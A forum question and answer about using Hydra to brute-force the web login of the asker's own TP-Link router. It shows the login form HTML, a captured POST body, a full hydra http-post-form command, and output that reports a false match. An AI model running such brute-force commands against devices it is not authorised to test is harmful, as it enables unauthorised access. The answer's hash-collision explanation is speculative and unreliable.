
I set the simplest password for my tplink router: aaaaaaac. The default user is admin.

I looked at the page source and found this:

    <FORM METHOD="POST" ACTION="/Forms/login_security_1" name="Login_Form"><p>&nbsp;</p>
        <p>&nbsp;</p>
        <table width="540"  border="0" align=center cellpadding="0" cellspacing="0">
        <tr>
        <td><table width="100%" border="0" align=center cellpadding="0" cellspacing="0">
        <tr>
        <td height="31">&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
        <td width="8%">&nbsp;</td><td width="86%" valign=top>
        <table width="86%"  border="0" align=center>
        <tr>
        <td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
        <td align=center colspan=3 style="color:gray;font-family:Arial;text-align:left;margin:0px auto;font-size:14px;" id="tr1">
        </td><INPUT TYPE="HIDDEN" NAME="tipsFlag" VALUE="0"><INPUT TYPE="HIDDEN" NAME="timevalue" VALUE="0"><SCRIPT language="JavaScript">
        if(document.Login_Form.tipsFlag.value == 1){
        var infoStr='The username or password is incorrect,please input again.';
        document.getElementById("tr1").innerHTML = infoStr;
        }else if(document.Login_Form.tipsFlag.value == 2){
        timelast = document.Login_Form.timevalue.value;
        window.setInterval("IncreaseSec()", 1000);
        }
        </SCRIPT>
        </tr></table><table style="background-color:white" width="86%"  border="0" align=center>
        <tr>
        <td height=35>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
        <td align=right width=35%>
        <FONT color=gray><b>
        Username:</b></font>
        </td><td><INPUT TYPE="TEXT" NAME="Login_Name" SIZE="12" MAXLENGTH="31" VALUE="" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
        <td height=5>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
        <td align=right >
        <FONT color=gray><b>
        Password:</b></font>
        </td><td><INPUT TYPE="PASSWORD" NAME="Login_Pwd" SIZE="12" MAXLENGTH="31" VALUE="" autocomplete="off" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
        <td align=center colspan=3>
        <INPUT TYPE="BUTTON" NAME="texttpLoginBtn" VALUE="Login" class="LoginBtn" onClick="checkForm();"></td></tr><tr>
        <td align=center colspan=3>
        <INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenUsername" VALUE=""><INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenPassword" VALUE=""></td></tr><tr>
        <td height="30" colspan="3" style="text-align:center;">
        <label id="copyright" >
        Copyright &copy; 2014 TP-LINK Technologies Co., Ltd. All rights reserved.</label>
        </td></tr></table></td><td width="6%">&nbsp;</td></tr></table></td></tr></table><!-- RpZDT -->
    </form><p>&nbsp;</p>

I also looked at the POST source and found:

    tipsFlag=0&timevalue=0&Login_Name=34&Login_Pwd=Ha2S%2BeOKqmzA6nrlmTeh7%3D%3D&uiWebLoginhiddenUsername=e369853df766fa44e1ed0ff613f563bduiWebLoginhiddenPassword=e369853df766fa44e1ed0ff613f563bd

So I attacked my own router with this line:

    hydra -f -l admin -x 8:8:a -V 192.168.1.1 http-post-form "/login_security.html/Forms/login_security_1:tipsFlag=0&timevalue=0&Login_Name=^USER^&Login_Pwd=^PASS^&uiWebLoginhiddenUsername=^USER^&uiWebLoginhiddenPassword=^PASS^:bad"

Hydra found the wrong password:

    [80][http-post-form] host: 192.168.1.1   login: admin   password: aaaaaaak
    [STATUS] attack finished for 192.168.1.1 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found

What am I doing wrong?


1 Answer


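It's hard for me to say what hydra is doing, given my familiarity with it.. but a lot of the time passwords are hashed, so you don't need the actual value, you only need a value that has the same hash as the actual password. Check and see whether aaaaaaaak works as a login password for the router; if it does, it is just brute forcing from z-a, which is not what you expected.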

Answered 2016-12-24T18:55:33.487